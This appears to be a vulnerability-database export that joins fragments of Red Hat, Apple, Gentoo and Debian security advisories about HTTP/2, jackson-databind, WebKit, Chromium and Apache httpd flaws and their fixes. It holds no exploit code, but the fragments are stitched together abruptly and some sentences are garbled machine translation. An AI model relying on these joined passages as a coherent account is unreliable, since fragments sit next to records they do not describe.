mIfAOLmvYDp3JeHT3RBqRrtviz2UaWRTmE8E30EoC0C912w0NHpwS3fhuRmJov1X
lflTtWlQCuPE/7yFQEZqYYjmKMqAVeDk4K6smM/aTzMyM+uFgaksiSTrLzU0mcHJ
AAn9h59qlwUXNGRbyBCoLMJrKq5Sw1+xz518XIIjJOQDJbSqu8syzKgi/qSFuLRp
2c/OSKJ98CVoiCcyhsBW/c3B6eoDmSfeKqt6JwVH/Sva+d7Oj5vpWTB5GW4hDFFh
t3cuhvyavPnyAzxRnYw5syn/RTyjaOK1U6+6SbEtJVnlx9+FW0lKs/Pcx2ocYmfO
UCDXHgxmEP8DTKwJZyIZtybVkpqbXh6jf69NLROTTZMtEwJzE1NGG4ulcl6tutTq
S0gchuiUuxItZlD3a9ISBXXxV0iqqd7I5p78maohzIwfyZR13S++rFt7JnoVb7SO
DECfEs6VinGH0Z0YInceF6Y9N+SURBrcQpQK12/wtGSChFFU83FII2sxy6iG7pTF
HPTzByu+aYgFpuEF4EKSrDlZCVJ8Es5lyp+cF401o3oGJuNo9WYScKjb51a0+SLJ
zbmM3GoiGZI=QyyK
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
The purpose of this text-only errata is to inform you about the security
issues fixed in this release.
Security Fix(es):
* HTTP/2: flood using PING frames results in unbounded memory growth
(CVE-2019-9512)
* HTTP/2: flood using PRIORITY frames results in excessive resource
consumption (CVE-2019-9513)
* HTTP/2: flood using HEADERS frames results in unbounded memory growth
(CVE-2019-9514)
* HTTP/2: flood using SETTINGS frames results in unbounded memory growth
(CVE-2019-9515)
* HTTP/2: 0-length headers lead to denial of service (CVE-2019-9516)
* HTTP/2: request for large response leads to denial of service
(CVE-2019-9517)
* HTTP/2: flood using empty frames results in excessive resource
consumption (CVE-2019-9518)
* infinispan: invokeAccessibly method from ReflectionUtil class allows to
invoke private methods (CVE-2019-10174)
* spring-security-core: mishandling of user passwords allows logging in
with a password of NULL (CVE-2019-11272)
* jackson-databind: failure to block the logback-core class from
polymorphic deserialization leading to remote code execution
(CVE-2019-12384)
* jackson-databind: default typing mishandling leading to remote code
execution (CVE-2019-14379)
* xmlrpc: Deserialization of server-side exception from faultCause in
XMLRPC error response (CVE-2019-17570)
* js-jquery: Cross-site scripting via cross-domain ajax requests
(CVE-2015-9251)
* logback: Serialization vulnerability in SocketServer and
ServerSocketReceiver (CVE-2017-5929)
* js-jquery: XSS in responses from cross-origin ajax requests
(CVE-2017-16012)
* apache-commons-compress: ZipArchiveInputStream.read() fails to identify
correct EOF allowing for DoS via crafted zip (CVE-2018-11771)
* spring-data-api: potential information disclosure through maliciously
crafted example value in ExampleMatcher (CVE-2019-3802)
* undertow: leak credentials to log files
UndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888)
* shiro: Cookie padding oracle vulnerability with default configuration
(CVE-2019-12422)
* jackson-databind: polymorphic typing issue allows attacker to read
arbitrary local files on the server via crafted JSON message.
1725807 - CVE-2019-12384 jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution
1728993 - CVE-2019-11272 spring-security-core: mishandling of user passwords allows logging in with a password of NULL
1730316 - CVE-2019-3802 spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher
1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth
1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption
1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth
1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth
1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption
1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution
1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service
1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service
1752962 - CVE-2019-14439 jackson-databind: Polymorphic typing issue related to logback/JNDI
1774726 - CVE-2019-12422 shiro: Cookie padding oracle vulnerability with default configuration
1775193 - CVE-2019-17570 xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response
5 |
|
var-201112-0047
|
The Cascading Style Sheets (CSS) implementation in Google Chrome before 16.0.912.63 on 64-bit platforms does not properly manage property arrays, which allows remote attackers to cause a denial of service (memory corruption) via unspecified vectors. plural Apple Product Webkit A similar vulnerability exists for. Detail is Apple See vendor information for.Service disruption by a third party ( Memory corruption ) There is a possibility of being put into a state. Google Chrome is prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, spoof content, or cause denial-of-service conditions; other attacks may also be possible.
Versions prior to Chrome 16.0.912.63 are vulnerable. Google Chrome is a web browser developed by Google (Google). A remote attacker can cause a denial of service (memory corruption) with the help of an unknown vector.
These could be used in a malicious web site to direct the user to a
spoofed site that visually appears to be a legitimate domain. This
issue is addressed through an improved domain name validity check.
This issue does not affect OS X systems. Third-party websites could set cookies if the "Block Cookies"
preference in Safari was set to the default setting of "From third
parties and advertisers".
CVE-ID
CVE-2012-0640 : nshah
WebKit
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7.3, OS X Lion Server v10.7.3, Windows 7, Vista,
XP SP2 or later
Impact: HTTP authentication credentials may be inadvertently
disclosed to another site
Description: If a site uses HTTP authentication and redirects to
another site, the authentication credentials may be sent to the other
site. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-03-07-2 iOS 5.1 Software Update
iOS 5.1 Software Update is now available and addresses the following:
CFNetwork
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description: An issue existed in CFNetwork's handling of malformed
URLs. When accessing a maliciously crafted URL, CFNetwork could send
unexpected request headers.
CVE-ID
CVE-2012-0641 : Erling Ellingsen of Facebook
HFS
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Mounting a maliciously crafted disk image may lead to a
device shutdown or arbitrary code execution
Description: An integer underflow existed with the handling of HFS
catalog files.
CVE-ID
CVE-2012-0642 : pod2g
Kernel
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: A malicious program could bypass sandbox restrictions
Description: A logic issue existed in the handling of debug system
calls. This may allow a malicious program to gain code execution in
other programs with the same user privileges.
CVE-ID
CVE-2012-0643 : 2012 iOS Jailbreak Dream Team
libresolv
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Applications that use the libresolv library may be
vulnerable to an unexpected application termination or arbitrary code
execution
Description: An integer overflow existed in the handling of DNS
resource records, which may lead to heap memory corruption.
CVE-ID
CVE-2011-3453 : Ilja van Sprundel of IOActive
Passcode Lock
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: A person with physical access to the device may be able to
bypass the screen lock
Description: A race condition issue existed in the handling of slide
to dial gestures. This may allow a person with physical access to the
device to bypass the Passcode Lock screen.
CVE-ID
CVE-2012-0644 : Roland Kohler of the German Federal Ministry of
Economics and Technology
Safari
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Web page visits may be recorded in browser history even when
Private Browsing is active
Description: Safari's Private Browsing is designed to prevent
recording of a browsing session. Pages visited as a result of a site
using the JavaScript methods pushState or replaceState were recorded
in the browser history even when Private Browsing mode was active.
This issue is addressed by not recording such visits when Private
Browsing is active.
CVE-ID
CVE-2012-0585 : Eric Melville of American Express
Siri
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: An attacker with physical access to a locked phone could get
access to frontmost email message
Description: A design issue existed in Siri's lock screen
restrictions. If Siri was enabled for use on the lock screen, and
Mail was open with a message selected behind the lock screen, a voice
command could be used to send that message to an arbitrary recipient.
This issue is addressed by disabling forwarding of active messages
from the lock screen.
CVE-ID
CVE-2012-0645
VPN
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: A maliciously crafted system configuration file may lead to
arbitrary code execution with system privileges
Description: A format string vulnerability existed in the handling
of racoon configuration files.
CVE-ID
CVE-2012-0646 : pod2g
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to the
disclosure of cookies
Description: A cross-origin issue existed in WebKit, which may allow
cookies to be disclosed across origins.
CVE-ID
CVE-2011-3887 : Sergey Glazunov
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website and dragging content
with the mouse may lead to a cross-site scripting attack
Description: A cross-origin issue existed in WebKit, which may allow
content to be dragged and dropped across origins.
CVE-ID
CVE-2012-0590 : Adam Barth of Google Chrome Security Team
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: Multiple cross-origin issues existed in WebKit.
CVE-ID
CVE-2011-3881 : Sergey Glazunov
CVE-2012-0586 : Sergey Glazunov
CVE-2012-0587 : Sergey Glazunov
CVE-2012-0588 : Jochen Eisinger of Google Chrome Team
CVE-2012-0589 : Alan Austin of polyvore.com
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
CVE-ID
CVE-2011-2825 : wushi of team509 working with TippingPoint's Zero Day
Initiative
CVE-2011-2833 : Apple
CVE-2011-2846 : Arthur Gerkis, miaubiz
CVE-2011-2847 : miaubiz, Abhishek Arya (Inferno) of Google Chrome
Security Team using AddressSanitizer
CVE-2011-2854 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2855 : Arthur Gerkis, wushi of team509 working with iDefense
VCP
CVE-2011-2857 : miaubiz
CVE-2011-2860 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2867 : Dirk Schulze
CVE-2011-2868 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2869 : Cris Neckar of Google Chrome Security Team using
AddressSanitizer
CVE-2011-2870 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2871 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2872 : Abhishek Arya (Inferno) and Cris Neckar of Google
Chrome Security Team using AddressSanitizer
CVE-2011-2873 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2877 : miaubiz
CVE-2011-3885 : miaubiz
CVE-2011-3888 : miaubiz
CVE-2011-3897 : pa_kt working with TippingPoint's Zero Day Initiative
CVE-2011-3908 : Aki Helin of OUSPG
CVE-2011-3909 : Google Chrome Security Team (scarybeasts) and Chu
CVE-2011-3928 : wushi of team509 working with TippingPoint's Zero Day
Initiative
CVE-2012-0591 : miaubiz, and Martin Barbella
CVE-2012-0592 : Alexander Gavrun working with TippingPoint's Zero Day
Initiative
CVE-2012-0593 : Lei Zhang of the Chromium development community
CVE-2012-0594 : Adam Klein of the Chromium development community
CVE-2012-0595 : Apple
CVE-2012-0596 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0597 : miaubiz
CVE-2012-0598 : Sergey Glazunov
CVE-2012-0599 : Dmytro Gorbunov of SaveSources.com
CVE-2012-0600 : Marshall Greenblatt, Dharani Govindan of Google
Chrome, miaubiz, Aki Helin of OUSPG, Apple
CVE-2012-0601 : Apple
CVE-2012-0602 : Apple
CVE-2012-0603 : Apple
CVE-2012-0604 : Apple
CVE-2012-0605 : Apple
CVE-2012-0606 : Apple
CVE-2012-0607 : Apple
CVE-2012-0608 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0609 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0610 : miaubiz, Martin Barbella using AddressSanitizer
CVE-2012-0611 : Martin Barbella using AddressSanitizer
CVE-2012-0612 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0613 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0614 : miaubiz, Martin Barbella using AddressSanitizer
CVE-2012-0615 : Martin Barbella using AddressSanitizer
CVE-2012-0616 : miaubiz
CVE-2012-0617 : Martin Barbella using AddressSanitizer
CVE-2012-0618 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0619 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0620 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0621 : Martin Barbella using AddressSanitizer
CVE-2012-0622 : Dave Levin and Abhishek Arya of the Google Chrome
Security Team
CVE-2012-0623 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0624 : Martin Barbella using AddressSanitizer
CVE-2012-0625 : Martin Barbella
CVE-2012-0626 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0627 : Apple
CVE-2012-0628 : Slawomir Blazek, miaubiz, Abhishek Arya (Inferno) of
Google Chrome Security Team using AddressSanitizer
CVE-2012-0629 : Abhishek Arya (Inferno) of Google Chrome Security
Team
CVE-2012-0630 : Sergio Villar Senin of Igalia
CVE-2012-0631 : Abhishek Arya (Inferno) of Google Chrome Security
Team
CVE-2012-0632 : Cris Neckar of the Google Chrome Security Team using
AddressSanitizer
CVE-2012-0633 : Apple
CVE-2012-0635 : Julien Chaffraix of the Chromium development
community, Martin Barbella using AddressSanitizer
Installation note:
This update is only available through iTunes, and will not appear
in your computer's Software Update application, or in the Apple
Downloads site. Make sure you have an Internet connection and have
installed the latest version of iTunes from www.apple.com/itunes/
iTunes will automatically check Apple's update server on its weekly
schedule. When an update is detected, it will download it. When
the iPhone, iPod touch or iPad is docked, iTunes will present the
user with the option to install the update. We recommend applying
the update immediately if possible. Selecting Don't Install will
present the option the next time you connect your iPhone, iPod touch,
or iPad.
The automatic update process may take up to a week depending on the
day that iTunes checks for updates. You may manually obtain the
update via the Check for Updates button within iTunes. After doing
this, the update can be applied when your iPhone, iPod touch, or iPad
is docked to your computer.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update will be "5.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.16 (Darwin)
iQEcBAEBAgAGBQJPV6M3AAoJEGnF2JsdZQeef/cIAKBSn0czLzJO9fu6ZyjLRvxq
4pIZgfyEVGBzpn+9IeiGFTkkVf+bOsA+Q3RlcsG5g0RlbyFgnuWu59HHsnkrElbM
bCfnnTF5eYZX/3fnLzxpX7BUsEona3nf1gHfR24OeEn36C8rZ6rZJfMLqCJNNZGY
RDSga1oeMN/AbgZuR9sYKudkE0GOmkLZfR2G4WXmrU+JncR6XoROUwoJBPhg8z90
HAxgDEbduuLLOSe7CHLS3apbh0L2tmxPCWpiBmEMg6PTlFF0HhJQJ0wusrUc8nX6
7TDsAho73wCOpChzBGQeemc6+UEN2uDmUgwVkN6n4D/qN1u6E+d3coUXOlb8hIY=
=qPeE
-----END PGP SIGNATURE-----
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Chromium, V8: Multiple vulnerabilities
Date: January 08, 2012
Bugs: #394587, #397907
ID: 201201-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been reported in Chromium and V8, some of
which may allow execution of arbitrary code.
Background
==========
Chromium is an open source web browser project. V8 is Google's open
source JavaScript engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/chromium < 16.0.912.75 >= 16.0.912.75
2 dev-lang/v8 < 3.6.6.11 >= 3.6.6.11
-------------------------------------------------------------------
2 affected packages
-------------------------------------------------------------------
Description
===========
Multiple vulnerabilities have been discovered in Chromium and V8.
Please review the CVE identifiers and release notes referenced below
for details.
Impact
======
A context-dependent attacker could entice a user to open a specially
crafted web site or JavaScript program using Chromium or V8, possibly
resulting in the execution of arbitrary code with the privileges of the
process, or a Denial of Service condition.
The attacker could also perform URL bar spoofing.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Chromium users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-client/chromium-16.0.912.75"
All V8 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/v8-3.6.6.11"
References
==========
[ 1 ] CVE-2011-3903
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3903
[ 2 ] CVE-2011-3904
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3904
[ 3 ] CVE-2011-3906
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3906
[ 4 ] CVE-2011-3907
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3907
[ 5 ] CVE-2011-3908
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3908
[ 6 ] CVE-2011-3909
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3909
[ 7 ] CVE-2011-3910
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3910
[ 8 ] CVE-2011-3912
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3912
[ 9 ] CVE-2011-3913
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3913
[ 10 ] CVE-2011-3914
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3914
[ 11 ] CVE-2011-3917
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3917
[ 12 ] CVE-2011-3921
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3921
[ 13 ] CVE-2011-3922
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3922
[ 14 ] Release Notes 16.0.912.63
http://googlechromereleases.blogspot.com/2011/12/stable-channel-update.html
[ 15 ] Release Notes 16.0.912.75
http://googlechromereleases.blogspot.com/2012/01/stable-channel-update.html
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
|
|
var-202109-1805
|
Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. The server is fast, reliable and extensible through a simple API. No detailed vulnerability details are currently provided. 7) - noarch, x86_64
3.
Bug Fix(es):
* proxy rewrite to unix socket fails with CVE-2021-40438 fix (BZ#2022319)
Additional changes:
* To fix CVE-2022-29404, the default value for the "LimitRequestBody"
directive in the Apache HTTP Server has been changed from 0 (unlimited) to
1 GiB.
On systems where the value of "LimitRequestBody" is not explicitly
specified in an httpd configuration file, updating the httpd package sets
"LimitRequestBody" to the default value of 1 GiB. As a consequence, if the
total size of the HTTP request body exceeds this 1 GiB default limit, httpd
returns the 413 Request Entity Too Large error code.
If the new default allowed size of an HTTP request message body is
insufficient for your use case, update your httpd configuration files
within the respective context (server, per-directory, per-file, or
per-location) and set your preferred limit in bytes. For example, to set a
new 2 GiB limit, use:
LimitRequestBody 2147483648
Systems already configured to use any explicit value for the
"LimitRequestBody" directive are unaffected by this change.
For the oldstable distribution (buster), these problems have been fixed
in version 2.4.38-3+deb10u6.
For the stable distribution (bullseye), these problems have been fixed in
version 2.4.51-1~deb11u1.
We recommend that you upgrade your apache2 packages.
For the detailed security status of apache2 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/apache2
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmFgr44ACgkQEMKTtsN8
TjbophAAiZ+fhF2r8BUbQkL8BhpfqjA+hVsp9WEMTn8Gq6kiW0wLvK3jWPM301Ou
D4gHqKmFPmYNC1KBOyk/lJdxyD7iTUweUyLi3WXzxhIDMx0kxkRw1oXlyCHzIqSJ
M277bgk32h2cDCbsXjrN/8agKPcKgfwDqiyf/igfEq6V8OB2zVvJPKVFq45n54+q
4FPXSyx1g2u5ewSeXbU2uHDej6Qborui4osDdbwx8CT6aETi0cIXJ8RbXF3PUCHG
5DzZagnRq6GumPsl01jcPu7b9Ck8MlkxMSG3FRsSIJVkwpsQ2C34ywIJkFlzUZZh
jhdVUrfbyfLpSdcPcipAAjl9I6gDqa9SFdMRK7ixCpQ6iTiVeDZdJ8pA4jnSweNQ
THik07di9R0juX0p7peQiIyBKrEf7Y3WSvLOn0SBKXvZnzc/72rH2nP5FclsgCsV
TWxptziGridC43KB8/tDJAAOXVF2lzylzF70V/UGTNo1jk9w3/p6btU1iuzKspyY
Y4aPZla3DImI8mezrgFrGYNg7bZYLKuJyGDADKih2sUQpzmDZ6MJxKAE3NLRWyQa
7cCJdoNR9yVqytEw1Y/ZRXAXWfMb3Y1ts2EqR8hzLQgMYb0JC58cLMG3T0RgyPoO
A4CTIoYpK1WnsykAE8M4XFrnOW3lrtse6T8N/dTVMuodElAEhc0=
=/At6
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: httpd security update
Advisory ID: RHSA-2022:0143-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:0143
Issue date: 2022-01-17
CVE Names: CVE-2021-26691 CVE-2021-34798 CVE-2021-39275
CVE-2021-44790
====================================================================
1. Summary:
An update for httpd is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3.
Security Fix(es):
* httpd: mod_lua: Possible buffer overflow when parsing multipart content
(CVE-2021-44790)
* httpd: mod_session: Heap overflow via a crafted SessionHeader value
(CVE-2021-26691)
* httpd: NULL pointer dereference via malformed requests (CVE-2021-34798)
* httpd: Out-of-bounds write in ap_escape_quotes() via malicious input
(CVE-2021-39275)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing the updated packages, the httpd daemon will be restarted
automatically.
5. Bugs fixed (https://bugzilla.redhat.com/):
1966732 - CVE-2021-26691 httpd: mod_session: Heap overflow via a crafted SessionHeader value
2005119 - CVE-2021-39275 httpd: Out-of-bounds write in ap_escape_quotes() via malicious input
2005128 - CVE-2021-34798 httpd: NULL pointer dereference via malformed requests
2034674 - CVE-2021-44790 httpd: mod_lua: Possible buffer overflow when parsing multipart content
6. Package List:
Red Hat Enterprise Linux Client Optional (v. 7):
Source:
httpd-2.4.6-97.el7_9.4.src.rpm
noarch:
httpd-manual-2.4.6-97.el7_9.4.noarch.rpm
x86_64:
httpd-2.4.6-97.el7_9.4.x86_64.rpm
httpd-debuginfo-2.4.6-97.el7_9.4.x86_64.rpm
httpd-devel-2.4.6-97.el7_9.4.x86_64.rpm
httpd-tools-2.4.6-97.el7_9.4.x86_64.rpm
mod_ldap-2.4.6-97.el7_9.4.x86_64.rpm
mod_proxy_html-2.4.6-97.el7_9.4.x86_64.rpm
mod_session-2.4.6-97.el7_9.4.x86_64.rpm
mod_ssl-2.4.6-97.el7_9.4.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
Source:
httpd-2.4.6-97.el7_9.4.src.rpm
noarch:
httpd-manual-2.4.6-97.el7_9.4.noarch.rpm
x86_64:
httpd-2.4.6-97.el7_9.4.x86_64.rpm
httpd-debuginfo-2.4.6-97.el7_9.4.x86_64.rpm
httpd-devel-2.4.6-97.el7_9.4.x86_64.rpm
httpd-tools-2.4.6-97.el7_9.4.x86_64.rpm
mod_ldap-2.4.6-97.el7_9.4.x86_64.rpm
mod_proxy_html-2.4.6-97.el7_9.4.x86_64.rpm
mod_session-2.4.6-97.el7_9.4.x86_64.rpm
mod_ssl-2.4.6-97.el7_9.4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
httpd-2.4.6-97.el7_9.4.src.rpm
noarch:
httpd-manual-2.4.6-97.el7_9.4.noarch.rpm
ppc64:
httpd-2.4.6-97.el7_9.4.ppc64.rpm
httpd-debuginfo-2.4.6-97.el7_9.4.ppc64.rpm
httpd-devel-2.4.6-97.el7_9.4.ppc64.rpm
httpd-tools-2.4.6-97.el7_9.4.ppc64.rpm
mod_session-2.4.6-97.el7_9.4.ppc64.rpm
mod_ssl-2.4.6-97.el7_9.4.ppc64.rpm
ppc64le:
httpd-2.4.6-97.el7_9.4.ppc64le.rpm
httpd-debuginfo-2.4.6-97.el7_9.4.ppc64le.rpm
httpd-devel-2.4.6-97.el7_9.4.ppc64le.rpm
httpd-tools-2.4.6-97.el7_9.4.ppc64le.rpm
mod_session-2.4.6-97.el7_9.4.ppc64le.rpm
mod_ssl-2.4.6-97.el7_9.4.ppc64le.rpm
s390x:
httpd-2.4.6-97.el7_9.4.s390x.rpm
httpd-debuginfo-2.4.6-97.el7_9.4.s390x.rpm
httpd-devel-2.4.6-97.el7_9.4.s390x.rpm
httpd-tools-2.4.6-97.el7_9.4.s390x.rpm
mod_session-2.4.6-97.el7_9.4.s390x.rpm
mod_ssl-2.4.6-97.el7_9.4.s390x.rpm
x86_64:
httpd-2.4.6-97.el7_9.4.x86_64.rpm
httpd-debuginfo-2.4.6-97.el7_9.4.x86_64.rpm
httpd-devel-2.4.6-97.el7_9.4.x86_64.rpm
httpd-tools-2.4.6-97.el7_9.4.x86_64.rpm
mod_session-2.4.6-97.el7_9.4.x86_64.rpm
mod_ssl-2.4.6-97.el7_9.4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
httpd-debuginfo-2.4.6-97.el7_9.4.ppc64.rpm
mod_ldap-2.4.6-97.el7_9.4.ppc64.rpm
mod_proxy_html-2.4.6-97.el7_9.4.ppc64.rpm
ppc64le:
httpd-debuginfo-2.4.6-97.el7_9.4.ppc64le.rpm
mod_ldap-2.4.6-97.el7_9.4.ppc64le.rpm
mod_proxy_html-2.4.6-97.el7_9.4.ppc64le.rpm
s390x:
httpd-debuginfo-2.4.6-97.el7_9.4.s390x.rpm
mod_ldap-2.4.6-97.el7_9.4.s390x.rpm
mod_proxy_html-2.4.6-97.el7_9.4.s390x.rpm
x86_64:
httpd-debuginfo-2.4.6-97.el7_9.4.x86_64.rpm
mod_ldap-2.4.6-97.el7_9.4.x86_64.rpm
mod_proxy_html-2.4.6-97.el7_9.4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
httpd-2.4.6-97.el7_9.4.src.rpm
noarch:
httpd-manual-2.4.6-97.el7_9.4.noarch.rpm
x86_64:
httpd-2.4.6-97.el7_9.4.x86_64.rpm
httpd-debuginfo-2.4.6-97.el7_9.4.x86_64.rpm
httpd-devel-2.4.6-97.el7_9.4.x86_64.rpm
httpd-tools-2.4.6-97.el7_9.4.x86_64.rpm
mod_session-2.4.6-97.el7_9.4.x86_64.rpm
mod_ssl-2.4.6-97.el7_9.4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
httpd-debuginfo-2.4.6-97.el7_9.4.x86_64.rpm
mod_ldap-2.4.6-97.el7_9.4.x86_64.rpm
mod_proxy_html-2.4.6-97.el7_9.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2021-26691
